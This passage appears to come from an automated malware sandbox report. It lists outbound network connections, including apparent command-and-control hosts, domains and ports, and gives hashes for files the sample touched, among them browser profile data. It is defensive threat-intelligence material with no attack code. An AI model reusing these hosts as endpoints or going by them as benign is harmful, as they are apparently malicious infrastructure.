| US | 69.42.215.252:80 | freedns.afraid.org | tcp |
| US | 8.8.8.8:53 | 252.215.42.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | frojbdawmiojfg.sytes.net | udp |
| US | 8.8.8.8:53 | xred.mooo.com | udp |
| LV | 198.181.163.35:4410 | frojbdawmiojfg.sytes.net | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | tcp | |
| TH | 154.197.69.165:7000 | tcp | |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| NL | 188.190.10.161:4444 | tcp | |
| DE | 172.105.66.118:8080 | tcp | |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 20.83.148.22:80 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| SE | 45.155.250.90:53 | ckboihp.net | udp |
| US | 20.83.148.22:80 | tcp | |
| US | 185.208.158.202:80 | ckboihp.net | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| NL | 188.190.10.161:4444 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 20.83.148.22:80 | tcp |
Files
C:\Users\Admin\Desktop\Microsoft Edge.lnk
| MD5 | 898e4c605e6f80aa2c86e7fb916aafdd |
| SHA1 | 55dad04bc08f98c55771e6ee1ed87f200333afab |
| SHA256 | f9f31cdf27c0594c4c592ee5291bbed211a1342633892d4cf5b2366744d6d860 |
| SHA512 | aa2ff20881373003efb04ed49ec556ae33dbc9996c2c3a513271ab9e055291edad3f9c5605c31e30dce883473dae8eeff7cbcb03f1538fcab08d62eb894994ad |
C:\Users\Public\Desktop\Acrobat Reader DC.lnk
| MD5 | 6841cac105d0eed2d6bcb9285f9e44b0 |
| SHA1 | 52c0d54234608b19ce25919562811539c5f65698 |
| SHA256 | 1e84db67772e983d04329cad6ec5fe8205113721006518d0cb7c08d35425dff4 |
| SHA512 | cd4eaecbc967ada12549081e6fce225da6051c2edfc7e65d90e239450b6551d6d69ce6cccfe21ba00775e811cb605829ed71f7d8be7bf6ca7b9851d042fbe705 |
C:\Users\Public\Desktop\VLC media player.lnk
| MD5 | 1c443e313ba2cc8bf74e6a9ac0945b20 |
| SHA1 | 3c8679b4c93bc08b10cb1700bfc29ddf721d48c5 |
| SHA256 | ec5d6cdb7cc630b56d8ebe917ef3c2014ecf2cb9aebd18edc34b3f98a9d5a630 |
| SHA512 | eb40bcd231e78f7c4284b1ed485628eb820dbf9866faac75f2ae6aeb687e65f44191762409ffa085bb7bafa0274c397f25b4ea44068e6caf5b80fd2970c120b9 |
C:\Users\Public\Desktop\Firefox.lnk
| MD5 | d4d3040a1c67c538a69bdd2df3b384f0 |
| SHA1 | e19846e83dc22111407cfd251d0fb3c3f1429e5b |
| SHA256 | 8ffd9b476ffdddcbc6cc244d3305cf447d3afcdc8d897fd7df8614e54f34a773 |
| SHA512 | 2d5b7374a8268997fde97f8c75ace80d924a207360c6b4854b43ae553f82a61a97367f303c2a0897ca85805918228c7bedef61b08a33e4af4b1682605ecb8d50 |
C:\Users\Public\Desktop\Google Chrome.lnk
| MD5 | ea01545d0aeae08eb8dd828d556c6f57 |
| SHA1 | 3ee2d42681e3e3032007eb3ce33cc057f1c1614f |
| SHA256 | 879edcd25a2b736cef9166b27d2c58c57da960e3277659ec9efb61f4e748854a |
| SHA512 | 23143911722f5bfe579a8fffb668766381e9ccadf2169fff4ec5bb2dcecb6d27174b54a887daac4aeaff28dd6c63465a628b44cc101e48a48d225fea61b174ed |
C:\Users\Admin\Desktop\BlockProtect.clr
| MD5 | c6fb27738bcaab4c57b8ba526049854e |
| SHA1 | a111dccf888c7398e550e2294cb5e95158a04d14 |
| SHA256 | be826f43af3272733299113be42a572b78071a023f830d215a14941025fee181 |
| SHA512 | 00e6554d60fe722242e371bc5d2bb2c86fc8c03c8d660b31da4409d5f3dc4ed0eb69b05519684a269fe189dab2b77d7f16c2445aeaea89ae116c2ed5d1d8ebdb |
C:\Users\Admin\Desktop\CheckpointConvert.tiff
| MD5 | d97775a9479fb9c14779111d64626953 |
| SHA1 | 6c4a95efbb4ff13e837d89884c58500cf5deb6c7 |
| SHA256 | dece9a195383574871c122180bf6bd36c0301bf9de1b195e9997f11fd1567b20 |
| SHA512 | 0ecca2a4f11e9546c51dec9747ce8f539d65689509b16212cacf9ebb4c68228148e52a4ec04618133516e7be81ee3c76c5f9a4d84d1bd61796106d458e5654c8 |
C:\Users\Admin\Desktop\BlockUnblock.wmf
| MD5 | c94717e6b9db99beb5322d2ada6eda36 |
| SHA1 | 740517db57d5b9ba0b576e58e44afb51db5bc311 |
| SHA256 | 52901e832daa619ee8b6bd7128a330bc07657a9ce38f71ebd1b3e397b0430b64 |
| SHA512 | 3f89d78e97234c11389e197b7b9cacce4ab722ff211797da6a935cafaafeccc94edb8b74e2acad43aaf6a223c25c243c92a789ea91d951b518ce0783df6de1e9 |
C:\Users\Admin\Desktop\CloseDeny.pub
| MD5 | 2be14420356dc6d9e08596a8ea476c36 |
| SHA1 | d89115b18a6269d7a394ceb36c36bbcf184ea81c |
| SHA256 | c5599949b03fe5b6615c5229ea6b8b714424eb9b71dd0cab4cbba73f8a134075 |
| SHA512 | 05afa99eef216767c80843392186e91bdf8b0748430775c2b64c1e11479071aa3729933c793b1fa39e39c7c93abffec4b5c322ab8b8db707661ec20d5b8a53e7 |
C:\Users\Admin\Desktop\ImportAdd.html
| MD5 | ff98bbb9990fe518877c4d331935c5b5 |
| SHA1 | 8b25b671d0ef43c59633064d19c5f0368b3bbb38 |
| SHA256 | 12070cd118b9203292a0edd5ce2eee46aa41784293b481e271a5dab5fd3626f5 |
| SHA512 | 5aea44f848ad92499541e7ab8835b4111b2266a755d415284ee0a33595fafa04bcf1f971a8693e926fa6588b0fe8c0e9688f25f3c5c31f3458865ff0a9c8789f |
C:\Users\Admin\Desktop\LimitDeny.aifc
| MD5 | 12e3e86f31b731784595ec65d3bc773a |
| SHA1 | d78de3fee83dd02771f0aae1674b79d14f35a11a |
| SHA256 | 390e31f7895d4fb43cf80629cea58d428fb0633035c866dff167944a431870f6 |
| SHA512 | e8e11dacec635412426660ec737c2491f2e2a83a5e388b9e0b3e887be97906fd1e3424dbbdbd1058ed8de77330612553ace2bcd2da1fe8666291c880048fd2ba |
C:\Users\Admin\Desktop\ImportTest.rle
| MD5 | 5e3e7c43caae2d57861e7ac7942e9aac |
| SHA1 | 6ba97f84fd83c77feb31e6c7fe122356369869f0 |
| SHA256 | f178e295278344d088da3ee5790b087eb13a5d49a0dfd22da13e25334ec46648 |
| SHA512 | 70987d2ad1629ea66e21df4ad555cea70565e31ea5c642cec4054655733c5da88b411a711c0250066c79a09ce8fe372b09ff093d065b441163160a74a76005dd |
C:\Users\Admin\Desktop\ImportGet.reg
| MD5 | 53099f55f0fb96323bf371ac70d23948 |
| SHA1 | 1f2ec03b49a1d11d4e72e70d4bd8255ed08f5bda |
| SHA256 | 1fd788bca3f29d8b09f1a2cf953beb3b0aaddc8d4c90e335994a329a3ee4c679 |
| SHA512 | 1ee7731401509c7897fa35abb681c904c3546c1d534873f665ebab8bb0ca02c7e421e145c8271440c04be090bb2c992465b1ce130e05fdc876f0270eb8494003 |
C:\Users\Admin\Desktop\ReceivePop.eps
| MD5 | 5079261da77a72495b0b12c277e1806c |
| SHA1 | 0f7bfed20be3f3c7315996cc572cbb0b6b170e24 |
| SHA256 | 31cb86cc021f93585df223ae8c58d8e888e73a3f2382a94b5ac67069949f13ea |
| SHA512 | 98c910bb6197f170ca2490fcc81fcc12da195753b6f8cd6ea3104651b9b6b01948fafbe26cea3c4168a68df8c82fc9ca0ab76d83169c2a6962dcad3bedf062cf |
C:\Users\Admin\Desktop\EditTest.jpeg
| MD5 | bba902152cd8f0180c143d5b6289435e |
| SHA1 | e8b2b600fe049d15c98f692931a6fda2d4345f33 |
| SHA256 | fa66279e07e3d6133e1f1de3340a117e37f76a310c5b8b0a606f4a519ce7bebd |
| SHA512 | 6ca19febf595bc13cc522c1325feec73eabf7bae15b167d3509b2431982656c691ea53a1c04322a739a79708107afcb8f44a68140da7d6cc8888782004b4f6a5 |
C:\Users\Admin\Desktop\ExportClose.xlsx
| MD5 | 9e99a8ac3f35bbbbb17c6325d4474fa6 |
| SHA1 | bd269d4f0501130919a502b9cbfb7157a5455aac |
| SHA256 | 34624959683e47d62d26de3caba6417325cb15b65236c717ded76696f6cae5d1 |
| SHA512 | 108142f57e27450e049b942eabf7969d3422069b0310df3294fd1f763ebe99ebbf89ac30d0662642e36eb38e308f668460bb26034af4ebd3ef34f33d7c61c77e |
C:\Users\Admin\Desktop\SaveSwitch.docx
| MD5 | 7f7b8ea233a7228a86f43f7d64c0b9dc |
| SHA1 | cb9d73ae8ffd621742fe6b448a431ea7f33e34b7 |
| SHA256 | 2b22feaaa27dbcb35bca594fb09e60f1a4e46cc48d91ef38c7e3cb495d9794cd |
| SHA512 | c5bb30055853728c342e3201eff7065e6b28887476029bb0623291c66a869cb5d2b2e54b6b1e9363ab4f1591e16922ed3efed635fd7bc9fc22119c2c75401922 |
C:\Users\Admin\Desktop\RestoreJoin.pps
| MD5 | 68bd0f39b6bc7f25fc38ed833176279b |
| SHA1 | 705b50e86005761a362feee48fe0f92e3ea2a6ba |
| SHA256 | ebedf4078e2af153dd4496d7c8b7d7f1287c14b1be71fbc22994eed915192a4e |
| SHA512 | 5d201784a3ccf23b7f79f75c9482bccf2f218868631b60d39acb9421d301251f79d3177f02d045fa87cf58b072182b4c7edfd2bc80a6a01a8c59f0445d390a39 |
C:\Users\Admin\Desktop\WaitRestore.rle
| MD5 | ee0b2d264c4c16768f88188fbea27562 |
| SHA1 | 8705cf3db361e51e22fb95dd7151336d598feedb |
| SHA256 | 8959561cbc2b697c202958e9f0df19b65b609c153ae92a0061438bf5f652c394 |
| SHA512 | 05bf0d577b3d125f6d047c944289f053071f46b15f4fb1ad976612ca7159875d33053b58a6272a36195f732cb092faf0fffb7c237aaaf93fe7a8d8cfedcd0bce |
C:\Users\Admin\Desktop\WaitLock.pcx
| MD5 | 6e167e418ada05bf4bbfe70dc5cad1f1 |
| SHA1 | e8eb50e39da9c3b7f31ab8ff4ff1286203ff8a8c |
| SHA256 | 8488d485b4aaeef6cb432bdb1c65aa9db9dec6a3bd1ab5fbdf683109bdca21a4 |
| SHA512 | 93a3bdcfc811ed5da6c364f3a1554aa5fc5f64256350f2210133d374f62f244cc2bd3be75378fffa5bdd293ad449ec11e1b06968c28d327342caac6e3f360e13 |
C:\Users\Admin\Desktop\UseExit.tmp
| MD5 | e65e1fe9dc191e6a709137cdaa70144b |
| SHA1 | 799e8e968ca9e9377a0946a63289770cb0248556 |
| SHA256 | 07f2ebad852650c9842fc4c1c3e96bce4b9b3920a4d09fed609f6055fadaa596 |
| SHA512 | 54589bf77d5ea303d7eecf4e16d5cb85a0e796cd906112c1a8fa096f1c73f11f9e634b692f29e31f7c90ff366a15f2e5471a841d778f0aa32625ec4aad66cf9c |
C:\Users\Admin\Desktop\StartInitialize.ttc
| MD5 | fc7f09b0636d77515303bee05de489eb |
| SHA1 | 52f86666921d3be8b09ce4687b3f7091ac7bb879 |
| SHA256 | c19501e31965b110699d044a7bf474248a7f6145871300e3325d7b353a9196d9 |
| SHA512 | 58e9a1a6a4d5b85aca62ee38c90a3584ee3f8249e451ebaeccf6d403b7b80fd5fedd2880c1f4038d432c7b64de17bddc2ab503156bbfcf2737e235b682d81671 |
C:\Users\Admin\Desktop\SplitOpen.mp4
| MD5 | f37c1e6c2ff68bd084844ead99774087 |
| SHA1 | cbb0ca7a278553e16350d8e22fc593f1de25cedb |
| SHA256 | 5223ae16e2b1caf34ec4526388a72ca733ce00d3ef97436b0f53dae2572abbe6 |
| SHA512 | 2658fd5f5c13e20e3512c75326e0d7a0e736357ee4e57bbe1eabb43adf960866b41cdb1964923d3d1d5e66210eb542ca2d50a690ed68ce0a5a45c5ba320c46ad |
C:\Users\Admin\Desktop\SearchUse.php
| MD5 | 916dd39802ba873c174ecc84c130337a |
| SHA1 | beb235a6b7bc3c852dab2bc134ff023fefd8c0f9 |
| SHA256 | 0c8de6f710afd56d392882a810aea5fbf4847f5ef249c71fc1335db089a94b16 |
| SHA512 | b2f06fce2545e960c90ac1122d046a7790736699016cd9e2a9c3548a1d0759772fee566fd61a3c2cd0e704a3f7cfdd4b4508176f873e7752251b3513f20e8ea7 |
C:\Users\Admin\Desktop\RequestRevoke.zip
| MD5 | e65a92322cc1623d6355ee6149c1bc9c |
| SHA1 | 4b5faaf398acc392491b1c16ebd101df67c7f5bd |
| SHA256 | fdcbf6e1e38842832107b625e7b20dc99c62f73dab58a4b5fb66d1fd402a5de4 |
| SHA512 | 2a70e20ae8f654989ff6bfd5228715df51c3b8dbe29b06bc6e90b4a29118338edfa92afbe3f0a9b96d5aa164b9f872cb8723c2b2a9c102e1484eface6ec3a279 |
C:\Users\Admin\Desktop\PopUninstall.ex_
| MD5 | 7a90553e7e75dd270007564eeb334749 |
| SHA1 | f79ccf4f82b5980c9ab782b7827969d3e812fbb9 |
| SHA256 | 75c1aaf6c38cf0150779a0ec0cc40c35cb128f1e16787bcd71ece244f2d352fb |
| SHA512 | 04b3877da650604244e49152f58f5b5bb97c7492e1b2be34b4cdbacfb72611ebf32b7a917a0ef312f8a78f543fe069aac4688f51d7da4a1f610c2df4f97651a7 |
C:\Users\Admin\Desktop\OpenGroup.wmf
| MD5 | fb884d696aafe675df6cacc19096cca5 |
| SHA1 | 691aa465f86f7e78019842df6c4665b1d5dadf30 |
| SHA256 | 2b9cd24e680124307ec4ee766b05a6fe976c780fcd1bf081c738ed9d42925b5a |
| SHA512 | 1a6abad4a1ad4f3f3551afb49769aa799554b146e06d6530c1c2671576c25b4b0733e616139555db6c8565650bd49f99e40517ccf18a2d0e26407d4392c0f711 |
C:\Users\Admin\Desktop\LimitPush.tiff
| MD5 | 4a16525d367683035abb00910d08df08 |
| SHA1 | 6b5130defee42ff323adf1037de9830d95923de9 |
| SHA256 | eedce6d780182782e8f5a3e616bd283a1fdf8fa307208a0af8f606e1982cd0b1 |
| SHA512 | 24e749cbd7dc1222f0ae228f8f83089e4587f01f62d31f61589ca3f62c5de9379ec6158fddd5c0926bc339febc3ebb37839f4a1a5d41518cc1c99b6495d9603e |
C:\Users\Admin\Desktop\ConvertFromClose.vsdm
| MD5 | 6a0f6e91b0a997056fcf5e6ae9ec47dc |
| SHA1 | f7f8d1656dbde9e87117cf1d84c07aa8dbc7ec26 |
| SHA256 | 94680d03d47a86a83d788fc30639ce9c02b3e3e75627e6c7faa8a32af67dfdde |
| SHA512 | 117cbaa82cbb00fc279e7fee4790036fc7651d93484ca737dfb12c5aaa373051ced6bf0bc125a04ec2c1d49662b6ceca44a187a3270b1d95186425b66b84fcf4 |
C:\Users\Admin\Desktop\AddSearch.midi
| MD5 | e4f31b0a352dc5f17da6219529bd548a |
| SHA1 | c5f95646a0e41cbcf1c70b9e183ec0fc36031b8e |
| SHA256 | ce3fa6d720fdfa0e402d51db9ca5e3f494f1a9ad51730c7cc4c3d7ef8e09d5bd |
| SHA512 | 90f7c95eb018a61f6213d054bb60bce8ab5a168825e07fb2316bd0be63f853369c9f3dc3ad4b717fd76b9cc787e72a7b8a60613e4cafe61ef7b588baa557f133 |
C:\Users\Admin\Desktop\WriteSend.M2V
| MD5 | 8062a277b6d5e5d6a18cd3e0a2733858 |
| SHA1 | 4dea08c9b4186d87cbc35a571f15470bcd57f4ae |
| SHA256 | e2b6329564cf0f06a90ba39e173e61be018a2ccece45e0e35f32318bd2b55954 |
| SHA512 | d4aa8b6889a67e301b66ee6f67f720880c1726ac9e1c69d2e3b90afd76fbc0e79a2576a2abd5c4730cdedfbfd12a48db4d238b72179b407c41689a47bffa9f04 |
C:\Users\Admin\Desktop\SetApprove.wpl
| MD5 | 48e84abdc1019afccd15dc3a6c3b096f |
| SHA1 | 0b76e8c62ca38f1f32fcdfd77c9745329265e418 |
| SHA256 | 759c5d6cb2affa5603fe383220df7cec6ca99b91394405c3a36850d5c212eedb |
| SHA512 | e350a3345516e48fb011bc87e665510eeeacdb8624867122162cf459580262fb87fd62b89b8d20c56ddeb327c55712de81b2c90a6c2caa610b79a424da171d15 |
C:\Users\Admin\Desktop\MeasureInvoke.mp3
| MD5 | 41befde3636f9be32922614764c1a612 |
| SHA1 | 2101ca22d0df019b07ee2a3ad7f0b4cc82d5b5fc |
| SHA256 | 4ec8b45efe2fcc23eac8d3866155f25775a6ee0040f41db522b0e9fc48b2ab66 |
| SHA512 | 6bfa523900c4f368e3efa3d54d76cb89b395fc56b51261f21ba31369ad418f38504bfda716887b6cdf35ffea81bd60b7347f37e9b5cff4b114a7160d89f0a649 |
C:\Users\Admin\Desktop\GroupBlock.edrwx
| MD5 | 0d4e18e1bbfa3bfaf597add7da2abf38 |
| SHA1 | c01cb43827ed42449399cc5bd2eb5c3c679625e3 |
| SHA256 | 3c855792f02b17582cc61b39a0d87a1243747208c97fe3bbacb2aaef02ba7c22 |
| SHA512 | 1d2a0546798a8288f8f1f45154188f89914a989c79bce937bb5c3d8af64c1b18c83e9da3e608da74ca7f689b22b078b3dbe2d1b2dc0d483f316824f45bccd1c1 |
\??\pipe\crashpad_2848_URASUHTQJTPVFREW
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\56b68ae6-d0f5-41ff-981d-4766980813da.tmp
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | fe5840832f729172c812a876ca5b3347 |
| SHA1 | 19670d28f5344897175d5c2d3b6fb88f87da91b3 |
| SHA256 | 3b504dbac32a4f65731686d23db601cc9ba63a36758cf6aa7acd384462597551 |
| SHA512 | 1f10e0675a7a22bf7b701c5c37b5068f0631286b8b12429d44013632d192297a873c6dfdf85e02db05879a26a98f84c58997a67e37956245ab7acfc541be3113 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | f77cedf29ca686584012b08fac1a5afa |
| SHA1 | ac7837b663720c74f4525a334c46c71f493c57b1 |
| SHA256 | 2d90bd51a37c37a76b1d84f6bb8b35bcb8de1568439cd4dcd25b45b74fccf501 |
| SHA512 | cac6877ef1f4086f6badab2e2553c6bb11261d3d5a69830e21ca8596e28b1cbe582400214b85c30189cd23ef97011658ee47836023596c5cdf688f4e193ace12 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 5258c5e4629cdf0b4fb463bda2732351 |
| SHA1 | 94c5833de16c5070cdb5b27b1acc534e5e7a7992 |
| SHA256 | 2f74313a16afcc3dd4524130b688628e8059ef84c667bf49243e94d564c61b16 |
| SHA512 | bf79448d23b18478ea1abc4843f608bad9085a705502cb205ed88870ce0721ca9e29d71acaf76858db4d6b9d37e0729b5adb54abb813ffe3a942c800ae24f9f3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | c65a59fc3364b5e83c0805a188022e0d |
| SHA1 | 79f55e907586358988545d4aa09eae10932e826a |
| SHA256 | ebc19cba4484c8f54d90525442e84c97f398be20398460cadba73b117c7e99fc |
| SHA512 | 2e9b58ed919551b5c44250e16b376c6d9874e559f62302f3d7fdacd31d125a8e2df00fd9fa5520ce72215bda8922725e3871b38c306b9761286451553ee62f92 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 49384564f1345232cb1b0758264f5938 |
| SHA1 | 57f561386b46d6da7ddca625858228a23a84779f |
| SHA256 | d4b39c56813d89109dcee347b7a96d079dd2528e27a64461d0fcba188fc4c54f |
| SHA512 | 5182d3151f6dacf761ab0a9c48d940a57d72317a9dd16ed5b6c6a84bced3b129aed4fb57672ef5900b2ebb9c3b8da77ab903500accb423ea0f6e136ddc0f628c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\0c514e09-9193-447a-aef9-7002994e6d95
| MD5 | 10a881fe5355df424191947d7f84b763 |
| SHA1 | 08fb5d7686fe9659f45f667554020a3185fc912a |
| SHA256 | 337da218ee2870936ecf26661b46a31862d503c99a0b3d15c4aa5583a32ecc99 |
| SHA512 | 8ebb15328202450c391524323a2e6eb2cf63442be33dcde5135bf558e7a611e3fd30737914e421efe5827bde41a637775c9958569eedfc69350ba72310b970b8 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\eaf51357-d50a-4dcd-ae73-aaf4266c2afe
| MD5 | 62adbfb2cee5ec2a3daa684c9f2c9e2e |
| SHA1 | b0a9ecb69190bbc5b00c834cd4fcea13a85dfd51 |
| SHA256 | 1041360fd19a7ef6a413f40f4676ceb69e4f709f344a8367c21608269d033279 |
| SHA512 | 03d555511d80959609452bc12177548c98f8adc733f77eac2165ee1ee2980ea2d2eccbd52fbf5a2759662734046a854735bb27944a45f368036857ecf7c98c1b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\daa0ac63-7a8e-4451-af77-a7ea0682dec5
| MD5 | 983aea48d02ce7cb646c5d0898af0ad5 |
| SHA1 | 6a9be14d65dcd9935fe76fdf2b8096ee350707ce |
| SHA256 | 787c775ad539d0e9592c2b81cb10609f753e497ed7bdce02cb447e995603dbd5 |
| SHA512 | eff0793dc320632577c51765b0753294e251f2d856dd5b38dff57a30290bfb2c7c7575c789657717181438a78e87459cccc740fe178f2205d0ec06da46dd0077 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | e9bc53c811d396a9fb446a7eb7436e60 |
| SHA1 | e1240e6515e13e285c9885a5c4b29c64e2cbb143 |
| SHA256 | 59477f081e574eea5dbb3088e10e25c7d56c13a9d67511faeec9d66ec4a02c94 |
| SHA512 | 5588e5f1567e0b967bd52f07e62b6c182f94cadf41b1c48d637f6f2f9aef16e36fea014394a6e374c87eab40d597b4312e68243b6a8eee517c5efee15b0deaeb |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\activity-stream.discovery_stream.json
| MD5 | 298dcb6219bb04d1236274349aa0a4bf |
| SHA1 | aaaaee48b2ca51fff30e8cab213432ee8ca8efe3 |
| SHA256 | 10bc9afbcbb9b3cf19a706c5be8010fea631b19544a3abf4f2d7f74904883541 |
| SHA512 | b6674fb9bb7517f5a8641e30f71adaaa3424da4b01d75f2cd278bb78ac78e981b400b5ca0ac34437256601900d0ad370393270143cb9125aea8febd9dad0a99a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js
| MD5 | 2dd7b552a456d440f571c49e7f4cbc9d |
| SHA1 | f4d6346b48c97f4a45452aa361908fac08de44df |
| SHA256 | f9fc2dcef1037864706d3ae64a1a5b5661cacbb9a694435e76d670cfa91a5684 |
| SHA512 | 2aba193381b8d70f476746c35974710197eaa20684ec8a959638fb56d49a573fb634d6622bb115d2c23c859a6853bd6e31ed580f86f7d6319fe020d9b4dad73e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\AlternateServices.bin
| MD5 | a1ecd2873c416ca7ec1252ef4cf3d4fe |
| SHA1 | ae900216b2a6cb5c05a9fc74c4601fe5f4c1576f |
| SHA256 | 9e6e12284ae3280711a8ac9142ae761500d7b4a0de663143a6a3333483f2cc05 |
| SHA512 | 6b0ff03ebf37d2f821250e51c0f1a1b190a0e986b3a87c41cd225aa9caf5aacc4473417b77cecc9ea28db245c975dda4dbcf24102ac19e50a294aebab05863b0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 675d6c9cb92ce9840509c6093a18075c |
| SHA1 | 446d1b6b91e62d9716b7338dfa3d04b774f96f6f |
| SHA256 | 76e610059b160e05dd81b770c62264830aeee7912c23bdc024253d042a0faa08 |
| SHA512 | 7ce18a6bd2054b406740130ad330803c6d6de16ce9cd4591e297ed690dd60a1528a1b0f756b87ab4ae780ccc372ca665b174343b916e73251e78a76018b53688 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js
| MD5 | 3a63dc4f124a823c3aded5f91437882f |
| SHA1 | 512fd8f4a433d47614ecfc904e94d4e2818dad10 |
| SHA256 | 530fbe9d356af54960011e458b8aac20b54ed6be67b97b17f22995c378047247 |
| SHA512 | 73fa9fac80c3acaa54ac9311be14f19d0d79a1dc71920ba7dc05cb2979846468d8c3ed0e7702b620507bd5606b55e7f3c7b312d172c31812e3f786dbc4631268 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 49453baf6dc9526412bb0202d77c3e34 |
| SHA1 | 02be0b74fba9689f8adb6f7f5ea839a78a867a64 |
| SHA256 | 834cf12024eb4f60401c24650cc8489bf112f655af07fccbfe81ad6c548da90e |
| SHA512 | 572fb4cfd49e86ad75f5e9fd2558e1a66d7942013b3ad7523107f08b1772186f351c95949d4f579bc1f744b869af6cb63fe16a4fc72ccf39f7c92635b0e12cec |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js
| MD5 | c3fb087dae9c9798106cdfc4c3b6c19c |
| SHA1 | 430bb88716fb8cd9a530bb791808d0df3ba976c5 |
| SHA256 | 67cc4a1cbb3da67a93a133f98832f6eee3eb05e98b26e215b3ed828149073e8c |
| SHA512 | 16f726ca2f31753b9a6e2b105432e3d57456091126f4071cad565c2d1d733bcbeee8a54c6de4a38432e506558ec83c51248cdc3e4bb5a97bd665726864a5cb41 |
C:\Users\Admin\AppData\Local\Temp\tmpaddon
| MD5 | 09372174e83dbbf696ee732fd2e875bb |
| SHA1 | ba360186ba650a769f9303f48b7200fb5eaccee1 |
| SHA256 | c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f |
| SHA512 | b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
| MD5 | 2a461e9eb87fd1955cea740a3444ee7a |
| SHA1 | b10755914c713f5a4677494dbe8a686ed458c3c5 |
| SHA256 | 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc |
| SHA512 | 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
